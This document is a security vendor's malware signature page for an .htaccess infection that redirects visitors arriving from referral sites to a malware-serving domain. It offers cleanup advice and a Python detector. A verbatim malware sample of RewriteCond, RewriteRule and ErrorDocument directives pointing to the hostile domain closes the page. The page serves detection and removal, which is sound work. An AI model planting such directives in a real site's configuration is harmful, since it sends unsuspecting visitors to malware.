SiteCheck Signatures

malware-entry-mwhta4

Description:

This attack uses .htaccess to redirect users to a site serving malware (or spam).

Loads malware from:

http://redrt.org.in
And other domains.

Affecting:

Any type of web site (no specific target).

Clean up and details:

Remove the offending code from .htaccess.
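One way to locate the directives to remove, as an added example (not SiteCheck's own detection code): it flags RewriteRule lines guarded by an HTTP_REFERER condition that redirect to an external host, and ErrorDocument lines pointing at an external URL. The function names, the `own_hosts` parameter and the sample text are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlparse

ABSOLUTE_URL = re.compile(r"^https?://", re.I)

def is_external(target, own_hosts):
    """True if target is an absolute URL whose host is not one of ours."""
    if not ABSOLUTE_URL.match(target):
        return False
    return (urlparse(target).hostname or "") not in own_hosts

def find_suspicious(htaccess_text, own_hosts=()):
    """Return (line_no, reason, line) for redirect directives worth reviewing."""
    findings = []
    referer_cond_seen = False  # RewriteCond on HTTP_REFERER awaiting its RewriteRule
    for no, raw in enumerate(htaccess_text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        parts = line.split()
        directive = parts[0].lower()
        target = parts[2] if len(parts) > 2 else ""
        if directive == "rewritecond":
            if len(parts) > 1 and "http_referer" in parts[1].lower():
                referer_cond_seen = True
        elif directive == "rewriterule":
            # Conditions apply only to the next RewriteRule, so reset afterwards.
            if referer_cond_seen and is_external(target, own_hosts):
                findings.append((no, "referer-conditional external redirect", line))
            referer_cond_seen = False
        elif directive == "errordocument" and is_external(target, own_hosts):
            findings.append((no, "ErrorDocument pointing to external URL", line))
    return findings

# Constructed sample modelled on this signature; hosts are placeholders.
SAMPLE = """\
RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.* [NC,OR]
RewriteCond %{HTTP_REFERER} .*yahoo.* [NC]
RewriteRule .* http://malicious.example/in.cgi?4 [R,L]
ErrorDocument 404 http://malicious.example/in.cgi?4
ErrorDocument 403 /errors/403.html
RewriteCond %{HTTPS} off
RewriteRule ^(.*)$ https://www.mysite.example/$1 [R=301,L]
"""

if __name__ == "__main__":
    for no, reason, line in find_suspicious(SAMPLE, own_hosts=("www.mysite.example",)):
        print(f"line {no}: {reason}: {line}")
```

Because the redirect fires only for visitors arriving from the listed referrers, loading the site directly will not reveal it; reviewing the file itself is the reliable check.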

Links:

http://blog.sucuri.net/2010/04/conditional-redirects-or-the-htaccess-malware.html

Malware sample:

..
RewriteCond %{HTTP_REFERER} .flickr. [NC,OR]
RewriteCond %{HTTP_REFERER} .yahoo.$ [NC]
RewriteRule .* http://redrt.org.in/in.cgi?4&parameter=0510 [R,L]
ErrorDocument 400 http://redrt.org.in/in.cgi?4&parameter=0510
ErrorDocument 401 http://redrt.org.in/in.cgi?4&parameter=0510
ErrorDocument 403 http://redrt.org.in/in.cgi?4&parameter=0510
ErrorDocument 404 http://redrt.org.in/in.cgi?4&parameter=0510